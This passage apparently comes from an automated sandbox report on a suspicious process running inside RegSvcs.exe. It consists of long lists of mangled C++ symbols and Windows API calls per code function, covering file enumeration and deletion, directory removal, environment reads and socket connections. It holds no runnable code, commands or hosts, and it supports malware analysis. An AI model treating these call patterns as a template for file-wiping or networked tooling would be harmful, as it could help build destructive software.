AE@ABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@6_2_013C0586
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_013B4C0A wcscmp,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,tolower,tolower,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,D3DKMTWaitForSynchronizationObjectFromGpu,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@G@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,tolower,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,6_2_013B4C0A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_013B3325 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindNextFileW,FindNextFileW,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,6_2_013B3325
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_013B477E _EH_prolog,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,socket,connect,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_CxxThrowException,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,_CxxThrowException,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,_CxxThrowException,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_CxxThrowException,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindClose,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE6_2_013B477E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_013C2BEE Sleep,wcscpy,wcscpy,wcscat,wcscat,wcscpy,wcscat,FindFirstFileW,wcscpy,RemoveDirectoryW,FindNextFileW,wcscat,RemoveDirectoryW,wcscpy,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,6_2_013C2BEE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_013B728F Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindNextFileA,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,DeleteFileA,GetLastError,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,6_2_013B728F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_00B04C0A wcscmp,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,tolower,tolower,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,D3DKMTWaitForSynchronizationObjectFromGpu,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@G@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,tolower,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,12_2_00B04C0A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_00B10586 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,D3DKMTWaitForSynchronizationObjectFromGpu,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator12_2_00B10586
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_00B0751B Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,FindNextFileA,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,12_2_00B0751B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_00B0728F Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindNextFileA,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,DeleteFileA,GetLastError,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,12_2_00B0728F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_00B12BEE Sleep,wcscpy,wcscpy,wcscat,wcscat,wcscpy,wcscat,FindFirstFileW,wcscpy,RemoveDirectoryW,FindNextFileW,wcscat,RemoveDirectoryW,wcscpy,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,12_2_00B12BEE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_00B03325 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindNextFileW,FindNextFileW,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,